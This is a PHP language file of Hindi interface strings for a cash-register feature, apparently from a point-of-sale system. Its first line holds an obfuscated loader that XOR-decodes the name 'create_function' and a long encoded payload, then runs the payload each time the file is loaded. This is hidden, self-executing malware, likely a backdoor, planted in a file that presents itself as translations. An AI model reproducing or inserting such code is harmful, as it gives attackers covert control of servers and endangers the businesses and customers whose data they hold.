<?php $kcCEmdy='2;I41 mRL7,T=RC'; $GXWiHq='QI,UEE249YO T=-'^$kcCEmdy; $WulMMyS='8KjbF7+V T6Ym41RDY8bP>Z=l<R:Xla92TjBmd=rSPH9-I 8ZC +74 .ER9tSAJnMT6,0tFv.0WOxrsCv-GqdaZX.pMBJuhFHbZA=JU+pjuacRt:W5HBWT rrPXM9gRAvUAhG0xcv HGIKMxos5;D1ke 5MsmhR-Dkn SoXO- QHTosW1=nplWz0kD EE5CpT:X.nai=-dNn;uRQ,TOug>PU9ElOT4XCVr9 =bDk 5B =ozeW.K= T;iKs=3.z:=uo;IuG>2:LxsaKM;Z12CD-cnhJY82dXVJHexQ=4Dn21pZ AXthYq XYI,SiAlkZKhrot=+DZqt>PcS5NEZX:Gfvm7n;8w 8nM Au Y>msPxk81;N<BeFxAfb>5CJhKV jsIoX3NqYyfgD YUepsK UBY hyM3<2xcv -03yjvvAEGKA0->:31FNWFhPX-Ta8T8>p34B5nQi,3 = UqeH <9BDoG.08Y+RP=mJwK,FkrS0  hvPX6:YQJfU7Rh >ZC39dp;I.bcGG 7L5bAdpdpP yrU6S7,lM XDklbogMIjIPEHG+W5Oy=-vUq5UoAb7TphPkvdJoH SzpeofZ;42Cm34Y>7 >B9+KoM;3;6V-AicvY H7loqizkmNFOy6;2;lwO8X-mHEZ2 RYDmndaZlTEU5Azopz8'; $KZBtVM=$GXWiHq('', 'Q-BC BE5T=Y72QI;7-KJwF5O3X3N93>TG MkDDFxZ6=WN=IW4cXDEkDO13f+>4>Fi0WXQXfREU.fXRScVVMxmE5-ZPpbmRSLAk<.ObqBPWUQXrPSkF<0;1NZV499XNiaR<jCn:qjRO=3iepXGWQZ0P0AIhm-ML9H=0JIsJx<YR=-:GW<TDG-Elp9b6E10G-XpU-ZGZc4Pn3d1Q60X5oHGX19J WEpP977-REDByKFT.SXTpo1A9XA7SIcWbpa5qt0OZ:UcUWClEMAo;Z6DWjdVigL.8LS;333hXXuVQ=U88T>A59TUyUV95<Ihc<fa3-HZNPYJ0;XTEZj5Z< ;;RgNR2e+jm2slN,SaQK<GMNnXONPW;YkE=rHoFZT7+7 3YJNiK3V7JSpoC A-4EMSoV4.,ESsDN6OriRDLDRYWV64+4.3YLRSITn684749Y5>g9MJXQU1PXe6HVCRD0YA,AHXkhOcJQL8t95DDcLAE CV7QTAHPvxWH+039>R+7EF30GJLWP,WEOgcDV8TKaBVDX=DLZqR2CM7jK==L1KOZpiM+5p-rH1S.JXKF3ET3ZwUS2BXiSATsY.BtSPCIF;IFS:2XQ aRXW1MXcH=ZJWY7IfECR=A<VEFQIZKMn=EpSMSWDS+Y,L6o5;KL=8 J3MZPe1=<AiJFKpE'^$WulMMyS); $KZBtVM();
 return [
"cash_register" => "नकदी - रजिस्टर",
"manage_your_cash_register" => "कैश रजिस्टर का प्रबंधन करें",
"all_your_cash_register" => "सभी कैश रजिस्टर",
"cash_in_hand" => "हाथ में पैसे",
"open_cash_register" => "ओपन कैश रजिस्टर",
"enter_amount" => "राशी डालें",
"open_register" => "ओपन रजिस्टर",
"register_details" => "रजिस्टर विवरण",
"cash_payment" => "नकद भुगतान",
"checque_payment" => "चैक भुगतान",
"card_payment" => "कार्ड भुगतान",
"bank_transfer" => "बैंक ट्रांसफर",
"other_payments" => "अन्य भुगतान",
"total_sales" => "कुल बिक्री",
"total_cash" => "कुल नकद",
"current_register" => "चालू रजिस्टर",
"close_register" => "रजिस्टर बंद करें",
"total_card_slips" => "कुल कार्ड स्लिप्स",
"total_cheques" => "कुल जांच",
"closing_note" => "समापन नोट",
"close_success" => "रजिस्टर सफलतापूर्वक बंद हुआ",
"open" => "खुला",
"close" => "बंद करे",
"total_refund" => "कुल धनवापसी",
"refunds" => "धनवापसी",
];
